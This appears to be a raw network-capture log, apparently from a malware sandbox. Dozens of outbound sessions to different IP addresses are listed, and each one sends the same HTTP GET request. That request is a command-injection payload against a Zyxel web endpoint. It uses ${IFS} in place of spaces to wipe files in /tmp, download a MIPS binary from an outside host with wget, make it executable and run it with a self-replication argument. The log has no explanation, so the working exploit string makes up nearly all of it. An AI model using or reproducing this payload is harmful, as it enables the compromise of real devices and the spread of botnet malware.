                                                Jan 12, 2024 18:24:55.346081018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9512192.168.2.1350970105.173.174.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346123934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9513192.168.2.1339600135.204.173.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346174002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9514192.168.2.1352448133.9.121.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346205950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9515192.168.2.134042646.197.66.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346261978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9516192.168.2.13352824.19.17.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346295118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9517192.168.2.1341262209.3.147.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346328974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9518192.168.2.133929292.174.180.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346359015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9519192.168.2.135881413.17.232.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346414089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9520192.168.2.1360192153.13.232.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346432924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9521192.168.2.134907037.21.211.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346478939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9522192.168.2.1337732138.190.113.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346524000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9523192.168.2.1341700180.234.216.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346538067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9524192.168.2.135290836.194.251.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346597910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9525192.168.2.1350672143.75.220.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346651077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9526192.168.2.1352388113.224.187.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346688986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9527192.168.2.1359404121.213.61.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.358779907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9528192.168.2.1357780159.138.13.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.358814001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9529192.168.2.133386413.244.81.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.358874083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9530192.168.2.135527013.136.137.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.358916998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9531192.168.2.1344134207.70.175.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.358978033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9532192.168.2.1334402136.29.99.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359016895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9533192.168.2.1345460220.76.177.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359070063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9534192.168.2.1339954122.132.229.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359111071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9535192.168.2.1342966151.230.141.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359153986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9536192.168.2.1334030170.250.160.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359220028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9537192.168.2.1339074208.177.4.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359261036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9538192.168.2.134478466.16.25.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359297037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9539192.168.2.1334362197.254.145.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359335899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9540192.168.2.134970013.119.240.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359357119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9541192.168.2.1344754167.92.161.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359380007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9542192.168.2.135440268.222.13.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359416008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9543192.168.2.1355002186.69.224.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359477043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9544192.168.2.1334342154.0.94.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359504938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9545192.168.2.134771214.211.9.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359560966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9546192.168.2.1359530201.161.205.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359654903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9547192.168.2.1353442140.231.60.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359715939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9548192.168.2.1343556167.20.94.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359755039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9549192.168.2.1335250176.26.101.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359807968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9550192.168.2.133355288.10.233.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359858990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9551192.168.2.1352094102.19.197.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359904051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9552192.168.2.1334276179.118.210.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359931946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9553192.168.2.1348988160.165.34.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.359987974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9554192.168.2.1356946133.151.28.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360021114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9555192.168.2.1347564188.210.169.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360080004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9556192.168.2.1355284222.100.58.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360137939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9557192.168.2.1352536152.244.148.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360187054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9558192.168.2.133515294.157.38.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360239029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9559192.168.2.1347712136.112.28.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360276937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9560192.168.2.135372874.192.176.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360313892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9561192.168.2.1338778134.236.8.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360361099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9562192.168.2.135312846.206.159.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360399961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9563192.168.2.135662280.159.26.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360457897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9564192.168.2.1355568118.90.8.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360503912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9565192.168.2.135649292.102.98.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360541105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9566192.168.2.1345794130.251.223.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360574961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9567192.168.2.1338082210.128.42.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360635996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9568192.168.2.133850496.140.214.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360677004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9569192.168.2.134111280.51.55.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360702038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9570192.168.2.133485290.91.43.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360739946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9571192.168.2.1346942162.169.200.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360846043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9572192.168.2.133740446.223.20.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360858917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9573192.168.2.134919650.57.131.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360888004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9574192.168.2.135250064.215.1.149443
                                                TimestampBytes transferredDirectionData
